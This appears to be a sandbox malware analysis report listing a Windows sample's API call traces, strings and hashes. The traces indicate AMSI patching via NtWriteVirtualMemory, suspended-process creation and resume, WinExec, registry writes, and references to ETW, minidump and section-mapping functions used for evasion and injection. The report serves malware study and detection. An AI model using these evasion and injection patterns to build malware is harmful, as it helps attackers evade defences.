call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 ResumeThread call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 CloseHandle call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c47ed4 call 2c487a0 * 6 CloseHandle call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 call 2c3480c call 2c3494c call 2c346a4 call 2c34798 call 2c3494c call 2c346a4 call 2c48824 5674->5992 5675->5674 5821->5822 5822->5553 5991->5992 5992->5463
APIs
  • Part of subcall function 02C48824: LoadLibraryA.KERNEL32(00000000,00000000,02C4890B), ref: 02C48858
  • Part of subcall function 02C48824: FreeLibrary.KERNEL32(74F60000,00000000,02C91388,Function_000065D8,00000004,02C91398,02C91388,05F5E0FF,00000040,02C9139C,74F60000,00000000,00000000,00000000,00000000,02C4890B), ref: 02C488EB
• CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02D857DC,02D85820,OpenSession,02C9137C,02C5AFD8,UacScan,02C9137C), ref: 02C57E39
• ResumeThread.KERNEL32(00000000,ScanBuffer,02C9137C,02C5AFD8,OpenSession,02C9137C,02C5AFD8,UacScan,02C9137C,02C5AFD8,ScanBuffer,02C9137C,02C5AFD8,OpenSession,02C9137C,02C5AFD8), ref: 02C58483
• CloseHandle.KERNEL32(00000000,ScanBuffer,02C9137C,02C5AFD8,OpenSession,02C9137C,02C5AFD8,UacScan,02C9137C,02C5AFD8,00000000,ScanBuffer,02C9137C,02C5AFD8,OpenSession,02C9137C), ref: 02C58602
  • Part of subcall function 02C487A0: LoadLibraryW.KERNEL32(bcrypt,?,00000884,00000000,02C913A4,02C4A3C7,ScanString,02C913A4,02C4A77C,ScanBuffer,02C913A4,02C4A77C,Initialize,02C913A4,02C4A77C,UacScan), ref: 02C487B4
  • Part of subcall function 02C487A0: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02C487CE
  • Part of subcall function 02C487A0: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000884,00000000,02C913A4,02C4A3C7,ScanString,02C913A4,02C4A77C,ScanBuffer,02C913A4,02C4A77C,Initialize), ref: 02C4880A
• CloseHandle.KERNEL32(00000000,00000000,ScanBuffer,02C9137C,02C5AFD8,UacInitialize,02C9137C,02C5AFD8,ScanBuffer,02C9137C,02C5AFD8,OpenSession,02C9137C,02C5AFD8,UacScan,02C9137C), ref: 02C589F4
  • Part of subcall function 02C37E18: GetFileAttributesA.KERNEL32(00000000,?,02C4F8CC,ScanString,02C9137C,02C5AFD8,OpenSession,02C9137C,02C5AFD8,ScanString,02C9137C,02C5AFD8,UacScan,02C9137C,02C5AFD8,UacInitialize), ref: 02C37E23
  • Part of subcall function 02C4DACC: RtlDosPa.N(00000000,?,00000000,00000000,00000000,02C4DB9E), ref: 02C4DB0B
  • Part of subcall function 02C4DACC: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02C4DB45
  • Part of subcall function 02C4DACC: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02C4DB72
  • Part of subcall function 02C4DACC: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02C4DB7B
  • Part of subcall function 02C4818C: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02C48216), ref: 02C481F8
• ExitProcess.KERNEL32(00000000,OpenSession,02C9137C,02C5AFD8,ScanBuffer,02C9137C,02C5AFD8,Initialize,02C9137C,02C5AFD8,00000000,00000000,00000000,ScanString,02C9137C,02C5AFD8), ref: 02C5AA25
Strings
Memory Dump Source
• Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
• Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2c30000_x.jbxd
Similarity
• API ID: Library$CloseFile$CreateFreeHandleLoadProcess$AddressAttributesCacheExitFlushInstructionProcResumeThreadUserWrite
• String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
• API String ID: 1548959583-1225450241
• Opcode ID: 93ec6913586ea9cd987206228e2362ffc2e4d4f9b112f8fa08b66d226fd45c6d
• Instruction ID: 277b592f913506e3fe2b7f684f30b3cf71ec2f6a101f2ac9799412016700788a
• Opcode Fuzzy Hash: 93ec6913586ea9cd987206228e2362ffc2e4d4f9b112f8fa08b66d226fd45c6d
• Instruction Fuzzy Hash: 37433EB5A501688FCB2AEB64DD809DE73BAFF84300F1046E1E409E7214DA31EE85EF55

Control-flow Graph
APIs
• Sleep.KERNEL32(00000000), ref: 02C317D0
• Sleep.KERNEL32(0000000A,00000000), ref: 02C317E6
Strings
Memory Dump Source
• Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
• Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2c30000_x.jbxd
Similarity
• API ID: Sleep
• String ID: 0`
• API String ID: 3472027048-3339448193
• Opcode ID: e7fb214c0a20c58dbbeb4f9d4ffbc0180e38c7b1066b5bbb5ee9ef190d9d49f6
• Instruction ID: 017eb86d364f8b19aba831356fe941b370faa2115aedf1b743a1050a886fb315
• Opcode Fuzzy Hash: e7fb214c0a20c58dbbeb4f9d4ffbc0180e38c7b1066b5bbb5ee9ef190d9d49f6
• Instruction Fuzzy Hash: 3AB12372A003518FEB16CF29D884355BBE1FB85325F1CCAAEE54E8B385D7B0A551CB90

Control-flow Graph
APIs
• Sleep.KERNEL32(00000000,?,?,00000000,02C31FE4), ref: 02C31B17
• Sleep.KERNEL32(0000000A,00000000,?,?,00000000,02C31FE4), ref: 02C31B31
Strings
Memory Dump Source
• Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
• Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2c30000_x.jbxd
Similarity
• API ID: Sleep
• String ID: 0`
• API String ID: 3472027048-3339448193
• Opcode ID: 5cacde97b5b612117085a6bdadc1037e764bfde5dd435e2ea4e6f05cc9618f12
• Instruction ID: e2a4c9c5a45dac62d67776d795f2b3c5bbe2b0898e4dfe99300841dfdd786f24
• Opcode Fuzzy Hash: 5cacde97b5b612117085a6bdadc1037e764bfde5dd435e2ea4e6f05cc9618f12
• Instruction Fuzzy Hash: 0E51D2716413408FE716DF68C984796BBD0AF85328F1C8AAEE54DCB282E7F0D545CBA1

Control-flow Graph
APIs
• LoadLibraryW.KERNEL32(amsi), ref: 02C48715
  • Part of subcall function 02C480C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02C48150,?,?,00000000,00000000,?,02C48069,00000000,KernelBASE,00000000,00000000,02C48090), ref: 02C48115
  • Part of subcall function 02C480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02C4811B
  • Part of subcall function 02C480C8: GetProcAddress.KERNEL32(?,?), ref: 02C4812D
  • Part of subcall function 02C47D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02C47D74
• FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02C48774
Strings
Memory Dump Source
• Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
                                                                                                                                      • String ID: DllGetClassObject$W$amsi
                                                                                                                                      • API String ID: 941070894-2671292670
                                                                                                                                      • Opcode ID: 74644a190c8eeffba923f1e1a2df1bc9695e3d1b873cc69756181fc187edd55e
                                                                                                                                      • Instruction ID: 457e32191beb9f47b59906b85faebf8c7baf19007d83900c77aa80edd7df08a2
                                                                                                                                      • Opcode Fuzzy Hash: 74644a190c8eeffba923f1e1a2df1bc9695e3d1b873cc69756181fc187edd55e
                                                                                                                                      • Instruction Fuzzy Hash: 2AF0C25114C381B9E201E6748C45F4FBFCD4B92224F448F5CF1E89A2D2DA79D108ABB7

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02C4E436
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CheckConnectionInternet
                                                                                                                                      • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                                                      • API String ID: 3847983778-3852638603
                                                                                                                                      • Opcode ID: e59c8983fe1c2e85b027e4d65f4e02582e629593d9ebc0d17fe5b010f0a83246
                                                                                                                                      • Instruction ID: 4a5f9952606cfbe9499ebd39d8182214ff08623dca9652df93c4683cd646455a
                                                                                                                                      • Opcode Fuzzy Hash: e59c8983fe1c2e85b027e4d65f4e02582e629593d9ebc0d17fe5b010f0a83246
                                                                                                                                      • Instruction Fuzzy Hash: CA41ED75B502089BEB26EBE4DC41ADEB3FAFF8C720F614835E441A7250DA74AD059F60
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 02C48020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02C48090,?,?,00000000,?,02C47A06,ntdll,00000000,00000000,02C47A4B,?,?,00000000), ref: 02C4805E
                                                                                                                                        • Part of subcall function 02C48020: GetModuleHandleA.KERNELBASE(?), ref: 02C48072
                                                                                                                                        • Part of subcall function 02C480C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02C48150,?,?,00000000,00000000,?,02C48069,00000000,KernelBASE,00000000,00000000,02C48090), ref: 02C48115
                                                                                                                                        • Part of subcall function 02C480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02C4811B
                                                                                                                                        • Part of subcall function 02C480C8: GetProcAddress.KERNEL32(?,?), ref: 02C4812D
                                                                                                                                      • WinExec.KERNEL32(?,?), ref: 02C48478
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: HandleModule$AddressProc$Exec
                                                                                                                                      • String ID: Kernel32$WinExec
                                                                                                                                      • API String ID: 2292790416-3609268280
                                                                                                                                      • Opcode ID: a741772963aee41e49a2a1f539ce8e2922d6e77e106eedff5643865012c18687
                                                                                                                                      • Instruction ID: 05dea1eb5984cce2f5032dcd92bf659c60a7dd222389037519777dc530a89563
                                                                                                                                      • Opcode Fuzzy Hash: a741772963aee41e49a2a1f539ce8e2922d6e77e106eedff5643865012c18687
                                                                                                                                      • Instruction Fuzzy Hash: B3018C75A40304BFEB25EFB4DC12B5B77EDEB48B10F918920B508D3A40DAB4AD00AB24
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 02C48020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02C48090,?,?,00000000,?,02C47A06,ntdll,00000000,00000000,02C47A4B,?,?,00000000), ref: 02C4805E
                                                                                                                                        • Part of subcall function 02C48020: GetModuleHandleA.KERNELBASE(?), ref: 02C48072
                                                                                                                                        • Part of subcall function 02C480C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02C48150,?,?,00000000,00000000,?,02C48069,00000000,KernelBASE,00000000,00000000,02C48090), ref: 02C48115
                                                                                                                                        • Part of subcall function 02C480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02C4811B
                                                                                                                                        • Part of subcall function 02C480C8: GetProcAddress.KERNEL32(?,?), ref: 02C4812D
                                                                                                                                      • WinExec.KERNEL32(?,?), ref: 02C48478
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: HandleModule$AddressProc$Exec
                                                                                                                                      • String ID: Kernel32$WinExec
                                                                                                                                      • API String ID: 2292790416-3609268280
                                                                                                                                      • Opcode ID: 8f93cace4291f86abe7c5b123408d080f9f3f7f4d0494010e9e538e9a10a54c9
                                                                                                                                      • Instruction ID: 15e5be89db59b10d03c1376575fe2479f1c1668d6262386a6a896fc8c9e32502
                                                                                                                                      • Opcode Fuzzy Hash: 8f93cace4291f86abe7c5b123408d080f9f3f7f4d0494010e9e538e9a10a54c9
                                                                                                                                      • Instruction Fuzzy Hash: 6AF08C75A40304BFEB25EFB4DC12B5B77ADEB48B10F918920B508D3A40DAB4A900AB24
                                                                                                                                      APIs
                                                                                                                                      • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02C45CFC,?,?,02C43888,00000001), ref: 02C45C10
                                                                                                                                      • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02C45CFC,?,?,02C43888,00000001), ref: 02C45C3E
                                                                                                                                        • Part of subcall function 02C37D18: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,02C43888,02C45C7E,00000000,02C45CFC,?,?,02C43888), ref: 02C37D66
                                                                                                                                        • Part of subcall function 02C37F20: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,02C43888,02C45C99,00000000,02C45CFC,?,?,02C43888,00000001), ref: 02C37F3F
                                                                                                                                      • GetLastError.KERNEL32(00000000,02C45CFC,?,?,02C43888,00000001), ref: 02C45CA3
                                                                                                                                        • Part of subcall function 02C3A700: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,02C3C361,00000000,02C3C3BB), ref: 02C3A71F
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 503785936-0
                                                                                                                                      • Opcode ID: 4b27867483863c2330f2790988e4724fe1693b96d4989c315da0de9ad8caf21c
                                                                                                                                      • Instruction ID: 12f69ae60be33bd6916f32d5c0a01406dfbd91539a0ef4d45055bee115005c1a
                                                                                                                                      • Opcode Fuzzy Hash: 4b27867483863c2330f2790988e4724fe1693b96d4989c315da0de9ad8caf21c
                                                                                                                                      • Instruction Fuzzy Hash: 2A318375A006489FDB01EFA4C880BEEB7F6AF48314F908965E904E7380DB755E05DFA1
                                                                                                                                      APIs
                                                                                                                                      • RegOpenKeyA.ADVAPI32(?,00000000,02D85914), ref: 02C4E704
                                                                                                                                      • RegSetValueExA.ADVAPI32(00000888,00000000,00000000,00000001,00000000,0000001C,00000000,02C4E76F), ref: 02C4E73C
                                                                                                                                      • RegCloseKey.ADVAPI32(00000888,00000888,00000000,00000000,00000001,00000000,0000001C,00000000,02C4E76F), ref: 02C4E747
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CloseOpenValue
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 779948276-0
                                                                                                                                      • Opcode ID: cc7da6f0a91d036c4e63578bd2eb868c9fe623d1d8929618d41013b529da07e4
                                                                                                                                      • Instruction ID: 1d54447ffb0e746ca168afd71625b57dade13e600e0cfffe651503f997691624
                                                                                                                                      • Opcode Fuzzy Hash: cc7da6f0a91d036c4e63578bd2eb868c9fe623d1d8929618d41013b529da07e4
                                                                                                                                      • Instruction Fuzzy Hash: 9C110A71A50204AFEB15FBA8DC81D6A7BADEB09720F914870F504D7350DA34EE40EA64
                                                                                                                                      APIs
                                                                                                                                      • RegOpenKeyA.ADVAPI32(?,00000000,02D85914), ref: 02C4E704
                                                                                                                                      • RegSetValueExA.ADVAPI32(00000888,00000000,00000000,00000001,00000000,0000001C,00000000,02C4E76F), ref: 02C4E73C
                                                                                                                                      • RegCloseKey.ADVAPI32(00000888,00000888,00000000,00000000,00000001,00000000,0000001C,00000000,02C4E76F), ref: 02C4E747
Memory Dump Source
• Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
• Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2c30000_x.jbxd
Similarity
• API ID: CloseOpenValue
• String ID:
• API String ID: 779948276-0
• Opcode ID: cab05c2177a38e14ccd67729476451cdc0147365d6785dacea8d67ebaa300b37
• Instruction ID: 7025a6a12bfa29ebd2be4b5c181371efef218cb94f2522d02057f00056349780
• Opcode Fuzzy Hash: cab05c2177a38e14ccd67729476451cdc0147365d6785dacea8d67ebaa300b37
• Instruction Fuzzy Hash: 62110A71A50204AFEB15FBA8DC81D6A7BADEB09720F914870F504D7350DA34EE40EA64
APIs
Similarity
• API ID: ClearVariant
• String ID:
• API String ID: 1473721057-0
• Opcode ID: d3c5128cd5883b3dbb19d42a97199c608e8a39298577f9c4db77a05d82ee4516
• Instruction ID: 2ef3ee6ea144926d29f65891675ee42734383efea1cb6ac7fb6af08ce2bc2146
• Opcode Fuzzy Hash: d3c5128cd5883b3dbb19d42a97199c608e8a39298577f9c4db77a05d82ee4516
• Instruction Fuzzy Hash: E0F0C22470420086C7A37B3AD9C466D279AAF84720B401C26E48EAB245CB34ED45DB63
APIs
• SysFreeString.OLEAUT32(02C4E950), ref: 02C34C1A
• SysAllocStringLen.OLEAUT32(?,?), ref: 02C34D07
• SysFreeString.OLEAUT32(00000000), ref: 02C34D19
Similarity
• API ID: String$Free$Alloc
• String ID:
• API String ID: 986138563-0
• Opcode ID: 5a5438c59bf50d5a9d2d1f0a3350fd82e771d5cb0ff699e6fe957ce0256f5644
• Instruction ID: ecc620ef0adb98f2bc9497b6fcbcd21215a8d69b8cadd030c834632bbbe1d52c
• Opcode Fuzzy Hash: 5a5438c59bf50d5a9d2d1f0a3350fd82e771d5cb0ff699e6fe957ce0256f5644
• Instruction Fuzzy Hash: D0E012B81056015EEF2B2F21AC40B37372ABFC1745B184C99E804CA150DBB5C841BD34
APIs
• SysFreeString.OLEAUT32(?), ref: 02C47362
Strings
Similarity
• API ID: FreeString
• String ID: H
• API String ID: 3341692771-2852464175
• Opcode ID: 8c705ad773aa16023462de185ca63ac80d3bda265738827f957a648109530cab
• Instruction ID: 18ce2942b171da082ed23940f4a30feac733fd6d5be5bbe5e32cbc3644887730
• Opcode Fuzzy Hash: 8c705ad773aa16023462de185ca63ac80d3bda265738827f957a648109530cab
• Instruction Fuzzy Hash: 4DB1F374A01608DFDB15CF99D880A9EFBF6FF89314F148569E809AB320DB31A949CF50
APIs
• LoadLibraryA.KERNEL32(00000000,00000000,02C4890B), ref: 02C48858
  • Part of subcall function 02C48020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02C48090,?,?,00000000,?,02C47A06,ntdll,00000000,00000000,02C47A4B,?,?,00000000), ref: 02C4805E
